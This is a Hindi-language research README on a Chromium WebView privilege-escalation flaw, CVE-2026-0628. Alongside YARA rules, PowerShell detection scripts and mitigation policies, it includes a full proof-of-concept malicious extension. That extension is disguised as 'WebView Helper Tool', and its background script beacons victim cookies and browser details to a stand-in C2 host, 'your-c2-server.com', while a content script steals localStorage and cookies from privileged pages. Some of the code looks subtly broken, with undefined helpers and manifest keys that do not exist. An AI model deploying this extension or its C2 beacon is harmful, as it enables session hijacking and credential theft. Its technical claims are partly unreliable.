
CVE-2026-0628 का तकनीकी विश्लेषण, जो क्रोमियम WebView विशेषाधिकार वृद्धि भेद्यता है, जिसमें मूल कारण विश्लेषण, PoC एक्सप्लॉइट, पहचान नियम और शमन रणनीतियाँ शामिल हैं।
= doi.org/10.5281/zenodo.18413764
= orcid.org/0009-0007-7728-256X
README.md
# **CVE-2026-0628: क्रोमियम WebView विशेषाधिकार वृद्धि (ओरिजिन स्पूफिंग) – तकनीकी अनुसंधान और प्रूफ-ऑफ-कॉन्सेप्ट**
**लेखक:** सस्त्र अदि विगुना (पर्पल एलीट टीमिंग)
**अनुसंधान तिथि:** जनवरी 2026
**CVE ID:** CVE-2026-0628
**CVSS v3.1:** 8.8 (उच्च)
**प्रभावित संस्करण:** क्रोमियम < 143.0.7499.192
**पैच स्थिति:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139 में पैच किया गया
---
## **1. अवलोकन**
### **1.1 अनुसंधान उद्देश्य**
यह रिपॉजिटरी **CVE-2026-0628** का दस्तावेजीकरण करता है, जो क्रोमियम के WebView नीति प्रवर्तन तंत्र में एक **उच्च-गंभीरता वाली विशेषाधिकार वृद्धि भेद्यता** है। यह भेद्यता दुर्भावनापूर्ण एक्सटेंशन को **सैंडबॉक्स प्रतिबंधों को बायपास** करने, **विशेषाधिकार प्राप्त संदर्भों** (जैसे, `chrome://`) में स्क्रिप्ट इंजेक्ट करने और **विशेषाधिकारों को बढ़ाकर** मनमाना कोड निष्पादित करने की अनुमति देती है।
यह अनुसंधान **विशेष रूप से रक्षात्मक सुरक्षा उद्देश्यों** के लिए है, जिनमें शामिल हैं:
- **भेद्यता विश्लेषण**
- **डिटेक्शन इंजीनियरिंग**
- **शमन रणनीति विकास**
- **पेनेट्रेशन टेस्टिंग (केवल अधिकृत वातावरण में)**
### **1.2 अस्वीकरण**
- **केवल शैक्षणिक और रक्षात्मक अनुसंधान के लिए सख्ती से।**
- **प्राधिकरण के बिना उत्पादन प्रणालियों के विरुद्ध उपयोग न करें।**
- **सभी लागू कानूनों और संगठनात्मक सुरक्षा नीतियों का पालन करें।**
- **तुरंत पैच करें:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139।
---
## **2. तकनीकी विवरण**
### **2.1 मूल कारण**
क्रोमियम के WebView कार्यान्वयन में **अपर्याप्त नीति प्रवर्तन** एक्सटेंशन को **सैंडबॉक्स सीमाओं से बचने** और **विशेषाधिकार प्राप्त DOM संदर्भों** तक पहुंचने की अनुमति देता है।
**भेद्य प्रवाह:**
1. दुर्भावनापूर्ण एक्सटेंशन `manifest.json` में WebView उपयोग घोषित करता है।
2. एक्सटेंशन `<webview>` टैग के माध्यम से क्राफ्टेड HTML/JS पेलोड इंजेक्ट करता है।
3. **WebView नीति सत्यापन बायपास** → विशेषाधिकार प्राप्त पृष्ठों तक पहुंच (जैसे, `chrome://settings`)।
4. विशेषाधिकार प्राप्त संदर्भों में **मनमाना स्क्रिप्ट निष्पादन**।
**CVSS वेक्टर:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
### **2.2 एक्सप्लॉइट आर्किटेक्चर**
#### **दुर्भावनापूर्ण एक्सटेंशन टेम्पलेट**
```json
{
"manifest_version": 3,
"name": "Legitimate Extension",
"version": "1.0",
"webview": {
"src": "chrome://new-tab-page/",
"plugins": {}
},
"content_scripts": [{
"matches": ["<all_urls>"],
"js": ["payload.js"]
}]
}
payload.js)class WebViewExploiter {
constructor() {
this.privilegedTargets = [
'chrome://new-tab-page/',
'chrome-extension://background/',
'chrome://settings/'
];
}
injectPayload(targetURL) {
const webview = document.createElement('webview');
webview.setAttribute('src', targetURL);
webview.setAttribute('nodeintegration', ''); // Key bypass parameter
webview.addEventListener('dom-ready', () => {
webview.executeScript({
code: `
window.chrome = window.chrome || {};
chrome.runtime.sendMessage({action: 'steal_data'});
document.body.innerHTML = '';
`
});
});
document.body.appendChild(webview);
}
}
rule CVE_2026_0628_WebView_Exploiter {
meta:
description = "Detects CVE-2026-0628 WebView exploit patterns"
severity = "high"
strings:
$webview_abuse = "webview.*(nodeintegration|allowpopups)"
$chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
$inject_sig = /(executeScript|getURL|sendMessage)/
condition:
all of ($*) and filesize < 500KB
}
chrome.exe → संदिग्ध WebView निर्माण।HKCU\Software\Google\Chrome\Extensions\[malicious_id]।// Vulnerable (pre-143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
return false; // Weak policy check
}
// Patched
function validateWebViewPolicy(webview) {
if (!isExtensionTrusted(webview.extensionId)) {
throw new SecurityError('Extension not privileged');
}
if (webview.attributes.includes('nodeintegration')) {
enforceStrictCSP(); // Content-Security-Policy hardening
}
}
{
"ExtensionInstallBlacklist": ["malicious_extension_id*"],
"ExtensionInstallForcelist": [],
"WebViewRestrictions": {
"DisableWebView": true,
"BlockNodeIntegration": true
}
}
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
$extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
Get-ChildItem $extPath | Where {
(Get-Content "$_\manifest.json" | Select-String "webview") -and
(Get-Content "$_\manifest.json" | Select-String "chrome://")
}
}
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html
manifest.json (बायपास मेनिफेस्ट){
"manifest_version": 3,
"name": "WebView Helper Tool",
"version": "1.0",
"permissions": ["activeTab", "storage", "tabs"],
"host_permissions": ["<all_urls>", "chrome://*/*"],
"background": {
"service_worker": "background.js"
},
"content_scripts": [{
"matches": ["<all_urls>"],
"js": ["content.js"],
"run_at": "document_start"
}],
"action": {
"default_popup": "popup.html"
},
"web_accessible_resources": [{
"resources": ["inject.js"],
"matches": ["<all_urls>"]
}]
}
background.js (स्थिरता और C2 बीकन)chrome.runtime.onInstalled.addListener(() => {
console.log('CVE-2026-0628 PoC Installed');
setTimeout(initExploitation, 5000);
});
async function initExploitation() {
fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
method: 'POST',
body: JSON.stringify({
victim: navigator.userAgent,
cookies: await getAllCookies()
})
}).catch(() => {});
chrome.tabs.onUpdated.addListener(exploitTab);
}
content.js (WebView ट्रिगर और इंजेक्शन)(function() {
const privilegedTargets = [
'chrome://new-tab-page/',
'chrome://settings/',
'chrome://extensions/'
];
function createMaliciousWebView(target) {
const webview = document.createElement('webview');
webview.setAttribute('src', target);
webview.setAttribute('allowpopups', '');
webview.addEventListener('dom-ready', () => {
chrome.scripting.executeScript({
target: {tabId: getCurrentTabId()},
func: stealPrivilegedData
});
});
document.body.appendChild(webview);
}
function stealPrivilegedData() {
return {
localStorage: Object.fromEntries(Object.entries(localStorage)),
cookies: document.cookie,
extensions: chrome.runtime.getManifest?.()
};
}
setTimeout(() => {
createMaliciousWebView('chrome://new-tab-page/');
}, 1000);
})();
chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
chrome://extensions/ पर नेविगेट करें।cve-2026-0628-poc/ चुनें।chrome://new-tab-page/ पर नेविगेट करें।localhost:8080) → C2 को बहिर्गमन कैप्चर करें।your-c2-server.com पर बीकन।"CVE-2026-0628 OWNED"।{
"ExtensionInstallBlacklist": ["*"],
"WebViewRestrictions": {
"DisableWebView": true,
"BlockNodeIntegration": true
}
}
# दुर्भावनापूर्ण एक्सटेंशन के लिए स्कैन करें
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/
rule CVE_2026_0628_Mojo_Origin_Spoof {
strings:
$mojo_hdr = { 4D 6F 6A 6F }
$chrome_origin = "chrome://new-tab-page/"
$webview_sig = "WebViewPolicyValidator"
condition:
all of them
}
संपर्क: रक्षात्मक सुरक्षा प्रश्नों के लिए, लेखक से GitHub Issues के माध्यम से संपर्क करें।
© 2026 सस्त्र अदि विगुना। सर्वाधिकार सुरक्षित।
| हमला चरण | तकनीकी प्रभाव | व्यावसायिक प्रभाव | CVSS मेट्रिक्स |
|---|
| एक्सटेंशन इंस्टॉल | उपयोगकर्ता सहमति → स्थिरता | सोशल इंजीनियरिंग वेक्टर | UI:R (आवश्यक) |
| WebView बायपास | सैंडबॉक्स एस्केप → विशेषाधिकार प्राप्त संदर्भ | सत्र अपहरण | S:U → C:H/I:H/A:H |
| स्क्रिप्ट इंजेक्शन | DOM हेरफेर → डेटा बहिर्गमन | क्रेडेंशियल चोरी | PR:N (कोई विशेषाधिकार नहीं) |
| स्थिरता | बैकग्राउंड स्क्रिप्ट → C2 बीकनिंग | पार्श्व गति तैयारी | AC:L (कम जटिलता) |